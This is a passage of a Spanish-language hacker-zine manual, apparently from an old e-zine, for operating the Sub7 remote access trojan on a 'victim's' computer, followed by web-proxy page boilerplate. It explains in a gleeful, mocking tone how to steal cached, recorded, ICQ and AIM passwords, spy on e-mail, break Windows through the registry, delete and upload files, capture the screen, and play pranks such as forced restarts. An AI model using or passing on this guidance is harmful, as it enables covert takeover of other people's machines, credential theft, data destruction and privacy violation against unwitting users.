activar (activate the matrix) y listo le va a aparecer una ventanita con lo que hallamos diseado. /*Msg menager*\ Sirve para mandar mensajer tanto de error commo de informacion, hay distintos tipos de iconos, tambien podemos editar los botones. Titulo del mensaje y mensaje. ;-() /*Spy*\ Esto es bueno, sirve para espiar distintas funciones del usuario, e-mail (varios servers de mail) Y el icq que la verdad esta muy bueno. #-D Servidores de mail de AOL, Yahoo mail y MSN (Hotmail) %-) ---------------------------------------------------------------------Pasemos a otro de los botones de la barra: [Advanced] /*Find Files*\ Esto es un simple pero util buscador de archivos, solo debemos indicar que archivo por ejemplo: *.jpg y nos dara todos los archivos con esa extencion. /*Passwords*\ Creo que nadie que hackea una maquina se ira sin ver los passwords de su victima. ;-))) esta es la que mas me gusta de todas la secciones. Tenemos: [Get cached passwords] = Tira una lista de los passwords del sistema [Get recorded passwords] = Tomar los passwords grabados [Clear recorded passwords] = Limpiar los passwords grabados [Shows received passwords] = Mostrar passwords recibidos [Get IcQ passwords] = LoS Passwords de todos los uins de icq [Get Aim passwords] = LoS Passwords de Aim /*Reg Edit*\ Uhhh! Pero no seas tan malo! con esto podes modificarle todo el windows, le borras una letra y cuando reinicie se llevara una linda sorpresa! JaJa! No seamos tan malos Che!!! -------------------------------------------------------------------Un nuevo boton: [Files/Windows] /*File manager*\ Bueno aca tenemos el control total de su Hd, lindo no? A jugar.... Hay.....varios.....comandos.......podemos.......ji..ji..ji..ji......... ......KoOL! -Get drives: Nos da todas la unidades que la victima tiene: A: C: D: G: R: Etc: -Run: Esto Sirve para ejecutar un comando manualmente, yo no se ninguno -Tipe patch: Sirve para ejecutar otro cliente, solo debemos saber donde se encuentra. -Download: Sirve para bajarse cualquier archivo que nosotros seleccionemos. -Get size: Nos muestra cuanto ocupa ese archivo, o esa unidad. -Edit file: Con esto podemos editar el archivo que hallamos seleccionado -Upload: Con esto podemos introducirle archivos en su Hd. -Delete: Cuidado con lo que le borras y mas cuidado con poner *.* me explico? -Play Wav: Le ejecutamos un sonido. Te lo imaginas?? JaJaJa! -Set wallpaper: Le asignamos un nuevo fondo en el escritorio. ;-)

-Print: Con esto podemos: Imprimirrr!!!! nooo que sarpado jajaja! -Display image: Podemos ver la imagen seleccionada. ;-)) Bueno creo que con esto tenes para divertirte mucho!!! pero para man esto es el principio. ----------------------------------------------------------------------Nuevo Boton: [Fun-Manager] /*Desktop/Web cam*\ -full screen captureEsta opcion dentro de todo esta piola, sirve para obtener una toma de lo que la victima esta viendo en ese momento. Para explicarte mejor presiona la tecla {Impr.Pant.Pet sis} de tu teclado que se encuentra al lado de F12. Luego abri en paint y pone "Edicion, Pegar". Esa imagen es la que captura el Sub7, claro que no la misma varia segun lo que la victima este viendo o usando. /*Flip Screen*\ Esta opcion sirve para darle vuelta la pantalla. ;-) solo devemos tildar una de las casillas y darle al flip screen. KoOL!! No? /*Print*\ Esta opcion sirve para mandarle a imprimir el texto que asignemos. En su impresora. Te lo imaginasss??? JuAs!!!!JuAs!!!! Podemos especificarle el tipo, color y tamao de fuente. /*Browser*\ En esta opcion podemos asignar una url y abrirle el navegador, dirigiendose a la url que asignamos. /*Win colours*\ Con esto podemos cambiarle los colores de windows. (menu inicio, barra de tareas, color de las ventanas, etc.) -----------------------------------------------------------------Boton nuevito: [Extra fun] /*Screen saver*\ Con esto podemos cambiar el protector de pantalla, asignarle un texto, color de fuente, color de fondo, tamao, etc. Ta weeeeno! /*Restart win*\ Bueno en este caso se la reiniciamos, pero nos desconectamos. Esta bueno para darselo como una despedida. Hay varias formas de reiniciarsela. Reiniando de la forma comun, aparecen esos carteles chorgos que dicen reiniciando el sistema, forsadamente, jaja esta me gusta mas. Apagarsela. y otras cosas que bueno al fin y al cabo son iguales. ;-) /*Mouse*\ Bueno. No sabes lo que es mouse? yo te explico, es esa cosa que manejas con las mano y tiene unos botones que el del medio no se pa que sirve pero en fin es eso si no entendiste jodete. Podemos cambiarle los botones de lugar, manejarselo nosotros con nuestras manias hackeserias, y bue una cosas mas que por supuesto no te voy a ensear todo. te crees que a mi vino mi mama y me enseo a usarlo? Naah aprendi tocando todo, asi aprendi tambien a formatear, manejar el windows, modificarle una giladas, etc.

/*Sound*\ Aca podemos reproducirle tocarle una giladas pero eso yo no se a si que no nada de efectos trucho y

algun sonido. Te lo imaginas??? Podemos eso es para los que saben musica con compu y te explico. Nada mas me gusta tocar la viola pedorros como Punch! puch! etc etc.

/*Time/Date*\ Podemos cambiarle la fecha dia hora y esas cosas. /*Extra*\ Bueno estas boludeces estan re buenas podemos abrirle la lectora de cds, encenderle y apagarle el monitor, ejecutarle ctrl+alt+del, prenderle los parlantes, etc. esta muy piola. ------------------------------------------------------------------BOTON NUEVOO Y EL ULTIMOOOO!!! [local options] Bueno no te enojes pero se supone que si estas leyendo este manual, de sub7 no sabes una mierda a si que bueno este boton es altamente importante, configuracion general de el programa y bueno jejeje te lo dejo para que aprendas tocando y solito. Soy malo no? Ji Ji Ji. Si tocas algo que no corresponde se te puede cagar el programa de ahi lo de que te lo dejo para que explores por tu cuenta. Despedida y agradecimientos ~~~~~~~~~~~~~~~~~~~~~~~~~~~ En fin, como todas las cosas de este mundo, todo tiene final, todo termina. Aprendi con este txt y bueno seguramente vos tambien debes a ver aprendido. ;-) Espero que te haya sido de mucha utilidad y te deseo toda la suerte del mundo. ---Buena Caza!!! []i[M]b[I]o[]y[] -) <---- Te cave no?. Hasta siempre pequeo enjendro del demonio. Nos vemos en el infierno. Estas lineas se las dedico a los mismos de siempre. PD: Mailto: simbiosys@uol.com.ar Dont Hack Team ******************************************************************************** ******************************************************************************** ******************************************************************************** ********************************************************************

Gracias, Simbiosys! En nombre de todos. Y me parece que ya es hora de que lo deje por esta entrega. Os aconsejo que si teneis una red casera probeis todas estas cosillas o ataqueis la mquina de un amigo previamente compinchado para aprender cosas. Pero poneoslo difcil, que as es como se aprende y escribir alguna Gununskada graciosa para mandarla por correo. Tened cuidado ah fuera

También podría gustarte

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy